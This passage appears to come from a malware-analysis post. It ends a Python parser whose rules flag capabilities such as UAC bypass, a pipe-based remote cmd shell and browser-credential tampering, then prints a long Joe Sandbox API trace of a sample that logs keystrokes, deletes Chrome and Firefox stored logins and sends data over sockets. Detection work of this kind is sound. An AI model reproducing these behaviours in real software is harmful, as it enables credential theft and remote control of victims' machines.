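• FindFirstFileA.KERNEL32(00000000,?,00000000,\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\), ref: 0040BBAF
• FindClose.KERNEL32(00000000), ref: 0040BBC9
• String ID: [Firefox StoredLogins Cleared!]$UserProfile$\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\$\\key3.db$\\logins.json
• Opcode ID: 8d7aaefdbbb17da70651c85bfc14742a28090f78922c13758640ed364e1dedc2
• Instruction Fuzzy Hash: 13516E3190421A9ADB14F7B2DC56DEEB739AF11304F10057FF406721E2EF785A89CA89
"""

# "• Api.MODULE(args), ref: ADDR", optionally prefixed "Part of subcall function X:".
API_LINE = re.compile(
    r"^\s*•\s*(?:Part of subcall function (?P<sub>[0-9A-F]+):\s*)?"
    r"(?P<api>[\w@]+)\.(?P<module>\w+)(?:\((?P<args>.*)\))?,? ref: (?P<ref>[0-9A-F]+)\s*$"
)
# Key/value bullets; "Instruction Fuzzy Hash" is the last field of every record.
KV_LINE = re.compile(r"^\s*•\s*(API ID|String ID|API String ID|Opcode ID|Instruction ID|"
                     r"Opcode Fuzzy Hash|Instruction Fuzzy Hash):\s*(.*)$")


@dataclass
class FunctionRecord:
    apis: list = field(default_factory=list)     # (api, module, ref, from_subcall)
    strings: list = field(default_factory=list)  # String ID split on '$', empties dropped
    opcode_id: str = ""

    def api_names(self):
        return {api for api, _, _, _ in self.apis}


def parse_records(text):
    """Split report text into FunctionRecords, one per Instruction Fuzzy Hash."""
    records, cur = [], FunctionRecord()
    for line in text.splitlines():
        m = API_LINE.match(line)
        if m:
            cur.apis.append((m["api"], m["module"], m["ref"], m["sub"] is not None))
            continue
        m = KV_LINE.match(line)
        if not m:
            continue                      # section headers and metadata we do not need
        key, value = m.groups()
        if key == "String ID":
            cur.strings = [s for s in value.split("$") if s]
        elif key == "Opcode ID":
            cur.opcode_id = value
        elif key == "Instruction Fuzzy Hash":
            records.append(cur)
            cur = FunctionRecord()
    return records


# Editor's rules (assumption): every listed API must appear; if needles are
# given, at least one must be a substring of some String ID entry.
RULES = [
    ("uac_bypass_com_elevation_moniker", {"CoGetObject"}, ("Elevation:Administrator!new:",)),
    ("remote_cmd_shell_over_pipes", {"CreatePipe", "CreateProcessA"}, ("cmd.exe",)),
    ("browser_credential_tampering", {"FindFirstFileA"},
     ("\\logins.json", "\\key3.db", "\\cookies.sqlite")),
    ("watchdog_self_restart", {"OpenMutexA", "CreateThread"}, ("Watchdog",)),
    ("clipboard_access", {"OpenClipboard", "GetClipboardData"}, ()),
    ("process_enumeration_for_injection", {"CreateToolhelp32Snapshot", "Process32FirstW"},
     ("ieinstal.exe", "ielowutil.exe")),
    ("service_enumeration", {"OpenSCManagerA", "EnumServicesStatusW"}, ()),
]


def capabilities(record):
    """Return the capability labels whose rule a record satisfies."""
    names = record.api_names()
    found = []
    for label, apis, needles in RULES:
        if not apis <= names:
            continue
        if needles and not any(n in s for n in needles for s in record.strings):
            continue
        found.append(label)
    return found


def summarize(text):
    """Map each record's Opcode ID (first 12 hex chars) to its flagged capabilities."""
    return {r.opcode_id[:12]: capabilities(r) for r in parse_records(text)}


if __name__ == "__main__":
    for oid, caps in summarize(SAMPLE_REPORT).items():
        print(oid, ", ".join(caps) or "-")
```

Run it against a report saved as text by replacing SAMPLE_REPORT with the file contents; records whose String ID carries only junk (the `0lG`, `XPG` entries above) still classify on their API set, which is why the pipe-shell rule keys on CreatePipe plus CreateProcessA rather than on the strings alone.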
                                                          APIs
                                                          • OpenSCManagerA.ADVAPI32(00000000,00000000,00000004,004758E8), ref: 0041A75E
                                                          • EnumServicesStatusW.ADVAPI32(00000000,0000003B,00000003,?,00000000,?,?,?), ref: 0041A7AD
                                                          • GetLastError.KERNEL32 ref: 0041A7BB
                                                          • EnumServicesStatusW.ADVAPI32(00000000,0000003B,00000003,00000000,?,?,?,?), ref: 0041A7F3
                                                          Memory Dump Source
                                                          • Source File: 00000004.00000002.3261739148.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000004.00000002.3261739148.0000000000474000.00000040.00000400.00020000.00000000.sdmp
                                                          • Associated: 00000004.00000002.3261739148.0000000000478000.00000040.00000400.00020000.00000000.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_4_2_400000_RegAsm.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: EnumServicesStatus$ErrorLastManagerOpen
                                                          • String ID:
                                                          • API String ID: 3587775597-0
                                                          APIs
                                                            • Part of subcall function 00448215: GetLastError.KERNEL32(00000020,?,0043A7F5,?,?,?,0043F9A8,?,?,00000020,00000000,?,?,?,0042DD01,0000003B), ref: 00448219
                                                            • Part of subcall function 00448215: _free.LIBCMT ref: 0044824C
                                                            • Part of subcall function 00448215: SetLastError.KERNEL32(00000000,0043F9A8,?,?,00000020,00000000,?,?,?,0042DD01,0000003B,?,00000041,00000000,00000000), ref: 0044828D
                                                            • Part of subcall function 00448215: _abort.LIBCMT ref: 00448293
                                                            • Part of subcall function 00448215: _free.LIBCMT ref: 00448274
                                                            • Part of subcall function 00448215: SetLastError.KERNEL32(00000000,0043F9A8,?,?,00000020,00000000,?,?,?,0042DD01,0000003B,?,00000041,00000000,00000000), ref: 00448281
                                                          • GetUserDefaultLCID.KERNEL32(?,?,?), ref: 0045271C
                                                          • IsValidCodePage.KERNEL32(00000000), ref: 00452777
                                                          • IsValidLocale.KERNEL32(?,00000001), ref: 00452786
                                                          • GetLocaleInfoW.KERNEL32(?,00001001,lJD,00000040,?,?,00000055,00000000,?,?,00000055,00000000), ref: 004527CE
                                                          • GetLocaleInfoW.KERNEL32(?,00001002,00000000,00000040), ref: 004527ED
                                                          Memory Dump Source
                                                          • Source File: 00000004.00000002.3261739148.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000004.00000002.3261739148.0000000000474000.00000040.00000400.00020000.00000000.sdmp
                                                          • Associated: 00000004.00000002.3261739148.0000000000478000.00000040.00000400.00020000.00000000.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_4_2_400000_RegAsm.jbxd
                                                          Similarity
                                                          • API ID: ErrorLastLocale$InfoValid_free$CodeDefaultPageUser_abort
                                                          • String ID: lJD$lJD$lJD
                                                          • API String ID: 745075371-479184356
                                                          APIs
                                                          • FindFirstFileW.KERNEL32(00000000,?,\Mozilla\Firefox\Profiles\,00000000), ref: 0040C39B
                                                          • FindNextFileW.KERNEL32(00000000,?), ref: 0040C46E
                                                          • FindClose.KERNEL32(00000000), ref: 0040C47D
                                                          • FindClose.KERNEL32(00000000), ref: 0040C4A8
                                                          Memory Dump Source
                                                          • Source File: 00000004.00000002.3261739148.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000004.00000002.3261739148.0000000000474000.00000040.00000400.00020000.00000000.sdmp
                                                          • Associated: 00000004.00000002.3261739148.0000000000478000.00000040.00000400.00020000.00000000.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_4_2_400000_RegAsm.jbxd
                                                          Similarity
                                                          • API ID: Find$CloseFile$FirstNext
                                                          • String ID: AppData$\Mozilla\Firefox\Profiles\$\cookies.sqlite
                                                          • API String ID: 1164774033-405221262
                                                          APIs
                                                          • FindFirstFileW.KERNEL32(?,?,?,?,?,?,?,004752D8,004752F0,00000001), ref: 0041C2EC
                                                          • FindNextFileW.KERNEL32(00000000,?,?,?,?,?,?,004752D8,004752F0,00000001), ref: 0041C31C
                                                          • SetFileAttributesW.KERNEL32(?,00000080,?,?,?,?,?,004752D8,004752F0,00000001), ref: 0041C38E
                                                          • DeleteFileW.KERNEL32(?,?,?,?,?,?,004752D8,004752F0,00000001), ref: 0041C39B
                                                            • Part of subcall function 0041C291: RemoveDirectoryW.KERNEL32(?,?,?,?,?,?,004752D8,004752F0,00000001), ref: 0041C371
                                                          • GetLastError.KERNEL32(?,?,?,?,?,004752D8,004752F0,00000001), ref: 0041C3BC
                                                          • FindClose.KERNEL32(00000000,?,?,?,?,?,004752D8,004752F0,00000001), ref: 0041C3D2
                                                          • RemoveDirectoryW.KERNEL32(00000000,?,?,?,?,?,004752D8,004752F0,00000001), ref: 0041C3D9
                                                          • FindClose.KERNEL32(00000000,?,?,?,?,?,004752D8,004752F0,00000001), ref: 0041C3E2
                                                          Memory Dump Source
                                                          • Source File: 00000004.00000002.3261739148.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000004.00000002.3261739148.0000000000474000.00000040.00000400.00020000.00000000.sdmp
                                                          • Associated: 00000004.00000002.3261739148.0000000000478000.00000040.00000400.00020000.00000000.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_4_2_400000_RegAsm.jbxd
                                                          Similarity
                                                          • API ID: FileFind$CloseDirectoryRemove$AttributesDeleteErrorFirstLastNext
                                                          • String ID:
                                                          • API String ID: 2341273852-0
                                                          APIs
                                                          • FindFirstFileW.KERNEL32(00000000,?), ref: 00419D4B
                                                          • FindNextFileW.KERNEL32(00000000,?,?), ref: 00419E17
                                                            • Part of subcall function 0041C485: CreateFileW.KERNEL32(00000000,80000000,00000003,00000000,00000003,00000080,00000000,?,?,?,00000000,0040A843), ref: 0041C49E
                                                          Memory Dump Source
                                                          • Source File: 00000004.00000002.3261739148.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000004.00000002.3261739148.0000000000474000.00000040.00000400.00020000.00000000.sdmp
                                                          • Associated: 00000004.00000002.3261739148.0000000000478000.00000040.00000400.00020000.00000000.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_4_2_400000_RegAsm.jbxd
                                                          Similarity
                                                          • API ID: File$Find$CreateFirstNext
                                                          • String ID: 8SG$PXG$PXG$NG$PG
                                                          • API String ID: 341183262-3812160132
                                                          APIs
                                                          • GetForegroundWindow.USER32 ref: 0040A416
                                                          • GetWindowThreadProcessId.USER32(00000000,?), ref: 0040A422
                                                          • GetKeyboardLayout.USER32(00000000), ref: 0040A429
                                                          • GetKeyState.USER32(00000010), ref: 0040A433
                                                          • GetKeyboardState.USER32(?), ref: 0040A43E
                                                          • ToUnicodeEx.USER32(?,?,?,?,00000010,00000000,00000000), ref: 0040A461
                                                          • ToUnicodeEx.USER32(?,?,00000010,00000000,00000000), ref: 0040A4C1
                                                          • ToUnicodeEx.USER32(?,?,?,?,00000010,00000000,00000000), ref: 0040A4FA
                                                          Memory Dump Source
                                                          • Source File: 00000004.00000002.3261739148.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000004.00000002.3261739148.0000000000474000.00000040.00000400.00020000.00000000.sdmp
                                                          • Associated: 00000004.00000002.3261739148.0000000000478000.00000040.00000400.00020000.00000000.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_4_2_400000_RegAsm.jbxd
                                                          Similarity
                                                          • API ID: Unicode$KeyboardStateWindow$ForegroundLayoutProcessThread
                                                          • String ID:
                                                          • API String ID: 1888522110-0
                                                          APIs
                                                          • RegCreateKeyExW.ADVAPI32(00000000,?,?,?,?,?,?,?,?,?,?,?,00000001), ref: 0041409D
                                                          • RegCloseKey.ADVAPI32(?,?,?,?,?,?,?,?,?,?,?,?,00000001), ref: 004140A9
                                                            • Part of subcall function 00404AA1: send.WS2_32(FFFFFFFF,00000000,00000000,00000000), ref: 00404B36
                                                          • LoadLibraryA.KERNEL32(Shlwapi.dll,SHDeleteKeyW,00000000,00000001), ref: 0041426A
                                                          • GetProcAddress.KERNEL32(00000000), ref: 00414271
                                                          Memory Dump Source
                                                          • Source File: 00000004.00000002.3261739148.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000004.00000002.3261739148.0000000000474000.00000040.00000400.00020000.00000000.sdmp
                                                          • Associated: 00000004.00000002.3261739148.0000000000478000.00000040.00000400.00020000.00000000.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_4_2_400000_RegAsm.jbxd
                                                          Similarity
                                                          • API ID: AddressCloseCreateLibraryLoadProcsend
                                                          • String ID: SHDeleteKeyW$Shlwapi.dll
                                                          • API String ID: 2127411465-314212984
                                                          APIs
                                                          • _free.LIBCMT ref: 00449212
                                                          • _free.LIBCMT ref: 00449236
                                                          • _free.LIBCMT ref: 004493BD
                                                          • GetTimeZoneInformation.KERNEL32(?,00000000,00000000,00000000,?,0045F234), ref: 004493CF
                                                          • WideCharToMultiByte.KERNEL32(00000000,00000000,00472764,000000FF,00000000,0000003F,00000000,?,?), ref: 00449447
                                                          • WideCharToMultiByte.KERNEL32(00000000,00000000,004727B8,000000FF,?,0000003F,00000000,?), ref: 00449474
                                                          • _free.LIBCMT ref: 00449589
                                                          Memory Dump Source
                                                          • Source File: 00000004.00000002.3261739148.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000004.00000002.3261739148.0000000000474000.00000040.00000400.00020000.00000000.sdmp
                                                          • Associated: 00000004.00000002.3261739148.0000000000478000.00000040.00000400.00020000.00000000.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_4_2_400000_RegAsm.jbxd
                                                          Similarity
                                                          • API ID: _free$ByteCharMultiWide$InformationTimeZone
                                                          • String ID:
                                                          • API String ID: 314583886-0
                                                          APIs
                                                            • Part of subcall function 00417952: GetCurrentProcess.KERNEL32(00000028,?), ref: 0041795F
                                                            • Part of subcall function 00417952: OpenProcessToken.ADVAPI32(00000000), ref: 00417966
                                                            • Part of subcall function 00417952: LookupPrivilegeValueA.ADVAPI32(00000000,SeShutdownPrivilege,?), ref: 00417978
                                                            • Part of subcall function 00417952: AdjustTokenPrivileges.ADVAPI32(?,00000000,?,00000000,00000000,00000000), ref: 00417997
                                                            • Part of subcall function 00417952: GetLastError.KERNEL32 ref: 0041799D
                                                          • ExitWindowsEx.USER32(00000000,00000001), ref: 00416856
                                                          • LoadLibraryA.KERNEL32(PowrProf.dll,SetSuspendState,00000000,00000000,00000000), ref: 0041686B
                                                          • GetProcAddress.KERNEL32(00000000), ref: 00416872
                                                          Memory Dump Source
                                                          • Source File: 00000004.00000002.3261739148.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000004.00000002.3261739148.0000000000474000.00000040.00000400.00020000.00000000.sdmp
                                                          • Associated: 00000004.00000002.3261739148.0000000000478000.00000040.00000400.00020000.00000000.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_4_2_400000_RegAsm.jbxd
                                                          Similarity
                                                          • API ID: ProcessToken$AddressAdjustCurrentErrorExitLastLibraryLoadLookupOpenPrivilegePrivilegesProcValueWindows
                                                          • String ID: !D@$PowrProf.dll$SetSuspendState
                                                          • API String ID: 1589313981-2876530381
                                                          APIs
                                                          • GetLocaleInfoW.KERNEL32(00000000,2000000B,00000000,00000002,00000000,?,?,?,0045275B,?,00000000), ref: 004524D5
                                                          • GetLocaleInfoW.KERNEL32(00000000,20001004,00000000,00000002,00000000,?,?,?,0045275B,?,00000000), ref: 004524FE
                                                          • GetACP.KERNEL32(?,?,0045275B,?,00000000), ref: 00452513
                                                          Memory Dump Source
                                                          • Source File: 00000004.00000002.3261739148.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000004.00000002.3261739148.0000000000474000.00000040.00000400.00020000.00000000.sdmp
                                                          • Associated: 00000004.00000002.3261739148.0000000000478000.00000040.00000400.00020000.00000000.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_4_2_400000_RegAsm.jbxd
                                                          Similarity
                                                          • API ID: InfoLocale
                                                          • String ID: ACP$OCP$['E
                                                          • API String ID: 2299586839-2532616801
                                                          APIs
                                                          • DeleteFileA.KERNEL32(00000000,\AppData\Local\Google\Chrome\User Data\Default\Login Data), ref: 0040BA4E
                                                          • GetLastError.KERNEL32 ref: 0040BA58
                                                          Strings
                                                          • UserProfile, xrefs: 0040BA1E
                                                          • [Chrome StoredLogins not found], xrefs: 0040BA72
                                                          • [Chrome StoredLogins found, cleared!], xrefs: 0040BA7E
                                                          • \AppData\Local\Google\Chrome\User Data\Default\Login Data, xrefs: 0040BA19
                                                          Memory Dump Source
                                                          • Source File: 00000004.00000002.3261739148.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000004.00000002.3261739148.0000000000474000.00000040.00000400.00020000.00000000.sdmp
                                                          • Associated: 00000004.00000002.3261739148.0000000000478000.00000040.00000400.00020000.00000000.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_4_2_400000_RegAsm.jbxd
                                                          Similarity
                                                          • API ID: DeleteErrorFileLast
                                                          • String ID: [Chrome StoredLogins found, cleared!]$[Chrome StoredLogins not found]$UserProfile$\AppData\Local\Google\Chrome\User Data\Default\Login Data
                                                          • API String ID: 2018770650-1062637481
                                                          APIs
                                                          • GetCurrentProcess.KERNEL32(00000028,?), ref: 0041795F
                                                          • OpenProcessToken.ADVAPI32(00000000), ref: 00417966
                                                          • LookupPrivilegeValueA.ADVAPI32(00000000,SeShutdownPrivilege,?), ref: 00417978
                                                          • AdjustTokenPrivileges.ADVAPI32(?,00000000,?,00000000,00000000,00000000), ref: 00417997
                                                          • GetLastError.KERNEL32 ref: 0041799D
                                                          Memory Dump Source
                                                          • Source File: 00000004.00000002.3261739148.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000004.00000002.3261739148.0000000000474000.00000040.00000400.00020000.00000000.sdmp
                                                          • Associated: 00000004.00000002.3261739148.0000000000478000.00000040.00000400.00020000.00000000.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_4_2_400000_RegAsm.jbxd
                                                          Similarity
                                                          • API ID: ProcessToken$AdjustCurrentErrorLastLookupOpenPrivilegePrivilegesValue
                                                          • String ID: SeShutdownPrivilege
                                                          • API String ID: 3534403312-3733053543
                                                          APIs
                                                          • __EH_prolog.LIBCMT ref: 00409258
                                                            • Part of subcall function 004048C8: connect.WS2_32(FFFFFFFF,00F780A0,00000010), ref: 004048E0
                                                            • Part of subcall function 00404AA1: send.WS2_32(FFFFFFFF,00000000,00000000,00000000), ref: 00404B36
                                                          • __CxxThrowException@8.LIBVCRUNTIME ref: 004092F4
                                                          • FindFirstFileW.KERNEL32(00000000,?,?,?,00000064), ref: 00409352
                                                          • FindNextFileW.KERNEL32(00000000,?), ref: 004093AA
                                                          • FindClose.KERNEL32(00000000), ref: 004093C1
                                                            • Part of subcall function 00404E26: WaitForSingleObject.KERNEL32(?,000000FF,?,?,?,00000000,?,004051C0,?,?,?,00405159), ref: 00404E38
                                                            • Part of subcall function 00404E26: SetEvent.KERNEL32(?,?,?,?,00000000,?,004051C0,?,?,?,00405159), ref: 00404E43
                                                            • Part of subcall function 00404E26: CloseHandle.KERNEL32(?,?,?,?,00000000,?,004051C0,?,?,?,00405159), ref: 00404E4C
                                                          • FindClose.KERNEL32(00000000), ref: 004095B9
                                                            • Part of subcall function 00404AA1: WaitForSingleObject.KERNEL32(00000000,00000000,0040547D,?,?,00000004,?,?,00000004,?,00474EF8,?), ref: 00404B47
                                                            • Part of subcall function 00404AA1: SetEvent.KERNEL32(00000000,?,?,00000004,?,?,00000004,?,00474EF8,?,?,?,?,?,?,0040547D), ref: 00404B75
                                                          Memory Dump Source
                                                          • Source File: 00000004.00000002.3261739148.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000004.00000002.3261739148.0000000000474000.00000040.00000400.00020000.00000000.sdmp
                                                          • Associated: 00000004.00000002.3261739148.0000000000478000.00000040.00000400.00020000.00000000.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_4_2_400000_RegAsm.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: Find$Close$EventFileObjectSingleWait$Exception@8FirstH_prologHandleNextThrowconnectsend
                                                          • String ID:
                                                          • API String ID: 1824512719-0
                                                          • Opcode ID: b872af409f18d4e2bb7bbba0f0478c6e37307eeb8e5c6a27a813a89ef4a7cb37
                                                          • Instruction ID: 125c9cc0036adb3739497efb01147483584b5989e706bb19fe9a4109aadf0594
                                                          • Opcode Fuzzy Hash: b872af409f18d4e2bb7bbba0f0478c6e37307eeb8e5c6a27a813a89ef4a7cb37
                                                          • Instruction Fuzzy Hash: DCB18D32900109AACB14EBA1DD96AED7779AF04318F10417FF506B60E2EF785E49CB98
                                                          APIs
                                                          • OpenSCManagerW.ADVAPI32(00000000,00000000,00000010,00000000,00000001,?,0041A6A0,00000000), ref: 0041AA53
                                                          • OpenServiceW.ADVAPI32(00000000,00000000,00000010,?,0041A6A0,00000000), ref: 0041AA68
                                                          • CloseServiceHandle.ADVAPI32(00000000,?,0041A6A0,00000000), ref: 0041AA75
                                                          • StartServiceW.ADVAPI32(00000000,00000000,00000000,?,0041A6A0,00000000), ref: 0041AA80
                                                          • CloseServiceHandle.ADVAPI32(00000000,?,0041A6A0,00000000), ref: 0041AA92
                                                          • CloseServiceHandle.ADVAPI32(00000000,?,0041A6A0,00000000), ref: 0041AA95
                                                          Memory Dump Source
                                                          • Source File: 00000004.00000002.3261739148.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000004.00000002.3261739148.0000000000474000.00000040.00000400.00020000.00000000.sdmp
                                                          • Associated: 00000004.00000002.3261739148.0000000000478000.00000040.00000400.00020000.00000000.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_4_2_400000_RegAsm.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: Service$CloseHandle$Open$ManagerStart
                                                          • String ID:
                                                          • API String ID: 276877138-0
                                                          • Opcode ID: 55aea4e01c19578bfbdca94b163ddb40001bd342cd849d2c6829f49351802c7e
                                                          • Instruction ID: 9fefcdd13c5f6832e1e8d6374d810b05479d45f16fba084c356bea358aebaaee
                                                          • Opcode Fuzzy Hash: 55aea4e01c19578bfbdca94b163ddb40001bd342cd849d2c6829f49351802c7e
                                                          • Instruction Fuzzy Hash: FCF08971101325AFD2119B619C88DFF2B6CDF85BA6B00082AF945921919B68CD49E9B9
                                                          APIs
                                                            • Part of subcall function 00448215: GetLastError.KERNEL32(00000020,?,0043A7F5,?,?,?,0043F9A8,?,?,00000020,00000000,?,?,?,0042DD01,0000003B), ref: 00448219
                                                            • Part of subcall function 00448215: _free.LIBCMT ref: 0044824C
                                                            • Part of subcall function 00448215: SetLastError.KERNEL32(00000000,0043F9A8,?,?,00000020,00000000,?,?,?,0042DD01,0000003B,?,00000041,00000000,00000000), ref: 0044828D
                                                            • Part of subcall function 00448215: _abort.LIBCMT ref: 00448293
                                                          • IsValidCodePage.KERNEL32(00000000,?,?,?,?,?,?,00444A73,?,?,?,?,004444CA,?,00000004), ref: 00451DBA
                                                          • _wcschr.LIBVCRUNTIME ref: 00451E4A
                                                          • _wcschr.LIBVCRUNTIME ref: 00451E58
                                                          • GetLocaleInfoW.KERNEL32(00000000,?,?,00000078,sJD,00000000,?), ref: 00451EFB
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000004.00000002.3261739148.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000004.00000002.3261739148.0000000000474000.00000040.00000400.00020000.00000000.sdmp
                                                          • Associated: 00000004.00000002.3261739148.0000000000478000.00000040.00000400.00020000.00000000.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_4_2_400000_RegAsm.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: ErrorLast_wcschr$CodeInfoLocalePageValid_abort_free
                                                          • String ID: sJD
                                                          • API String ID: 4212172061-3536923933
                                                          • Opcode ID: 7ea90a810ccb8eded513053f15f94d45dc96679ac5d2c45bddb92c1ff4a69e8d
                                                          • Instruction ID: 601d6103ecad0283333aca7e4f79148897faf6e4cefa34abd84194fcdbd45a0d
                                                          • Opcode Fuzzy Hash: 7ea90a810ccb8eded513053f15f94d45dc96679ac5d2c45bddb92c1ff4a69e8d
                                                          • Instruction Fuzzy Hash: ED61FA35500606AAE724AB75CC86BBB73A8EF04316F14046FFD05D7292EB78ED48C769
                                                          APIs
                                                          • FindResourceA.KERNEL32(SETTINGS,0000000A,00000000), ref: 0041B4B9
                                                          • LoadResource.KERNEL32(00000000,?,?,0040F3DE,00000000), ref: 0041B4CD
                                                          • LockResource.KERNEL32(00000000,?,?,0040F3DE,00000000), ref: 0041B4D4
                                                          • SizeofResource.KERNEL32(00000000,?,?,0040F3DE,00000000), ref: 0041B4E3
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000004.00000002.3261739148.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000004.00000002.3261739148.0000000000474000.00000040.00000400.00020000.00000000.sdmp
                                                          • Associated: 00000004.00000002.3261739148.0000000000478000.00000040.00000400.00020000.00000000.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_4_2_400000_RegAsm.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: Resource$FindLoadLockSizeof
                                                          • String ID: SETTINGS
                                                          • API String ID: 3473537107-594951305
                                                          • Opcode ID: 572f255012f9d3464d264dba9da87f940f43aba7d13ccaaee0753afa8a381888
                                                          • Instruction ID: 65170a014006dd87783428e4339c5f85687a52ee3761dac8d56b05c0676c202a
                                                          • Opcode Fuzzy Hash: 572f255012f9d3464d264dba9da87f940f43aba7d13ccaaee0753afa8a381888
                                                          • Instruction Fuzzy Hash: 8AE01A36200B22EBEB311BA5AC4CD473E29F7C97637100075F90596232CB798840DAA8
                                                          APIs
                                                          • __EH_prolog.LIBCMT ref: 0040966A
                                                          • FindFirstFileW.KERNEL32(00000000,?,00000000,00000000,?), ref: 004096E2
                                                          • FindNextFileW.KERNEL32(00000000,?), ref: 0040970B
                                                          • FindClose.KERNEL32(000000FF,?,?,?,?,?,?), ref: 00409722
                                                          Memory Dump Source
                                                          • Source File: 00000004.00000002.3261739148.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000004.00000002.3261739148.0000000000474000.00000040.00000400.00020000.00000000.sdmp
                                                          • Associated: 00000004.00000002.3261739148.0000000000478000.00000040.00000400.00020000.00000000.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_4_2_400000_RegAsm.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: Find$File$CloseFirstH_prologNext
                                                          • String ID:
                                                          • API String ID: 1157919129-0
                                                          • Opcode ID: 4a325c590a34807a26d63d289d9f2ec3f664a0255ff010795f7d94bc543c6bf4
                                                          • Instruction ID: bc6583c976318a9931a9d4e75bf6093b5b8d8c817350453c5398c0af4fd679c1
                                                          • Opcode Fuzzy Hash: 4a325c590a34807a26d63d289d9f2ec3f664a0255ff010795f7d94bc543c6bf4
                                                          • Instruction Fuzzy Hash: 59812B329001199BCB15EBA1DC969EDB378AF14318F10417FE506B71E2EF78AE49CB58
                                                          APIs
                                                          • __EH_prolog.LIBCMT ref: 00408811
                                                          • FindFirstFileW.KERNEL32(00000000,?,00466608,00000000,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 004088CA
                                                          • __CxxThrowException@8.LIBVCRUNTIME ref: 004088F2
                                                          • FindNextFileW.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 004088FF
                                                          • FindClose.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00408A15
                                                          Memory Dump Source
                                                          • Source File: 00000004.00000002.3261739148.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000004.00000002.3261739148.0000000000474000.00000040.00000400.00020000.00000000.sdmp
                                                          • Associated: 00000004.00000002.3261739148.0000000000478000.00000040.00000400.00020000.00000000.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_4_2_400000_RegAsm.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: Find$File$CloseException@8FirstH_prologNextThrow
                                                          • String ID:
                                                          • API String ID: 1771804793-0
                                                          • Opcode ID: 9a638f232f7986981f55bddf65949b622a13160512e68c16031e1c55a9115e6e
                                                          • Instruction ID: 1e810be39857a3d86828f92fa26e793a4655b35e172fafea17edde612d57cc14
                                                          • Opcode Fuzzy Hash: 9a638f232f7986981f55bddf65949b622a13160512e68c16031e1c55a9115e6e
                                                          • Instruction Fuzzy Hash: 16515F72900209AACF04FB61DD569ED7778AF11308F50417FB946B61E2EF389B48CB99
                                                          APIs
                                                          • FindFirstFileW.KERNEL32(00000000,?,?,?,00000000), ref: 00407857
                                                          • FindNextFileW.KERNEL32(00000000,?,?,?,00000000), ref: 0040791F
                                                            • Part of subcall function 00404AA1: send.WS2_32(FFFFFFFF,00000000,00000000,00000000), ref: 00404B36
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000004.00000002.3261739148.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
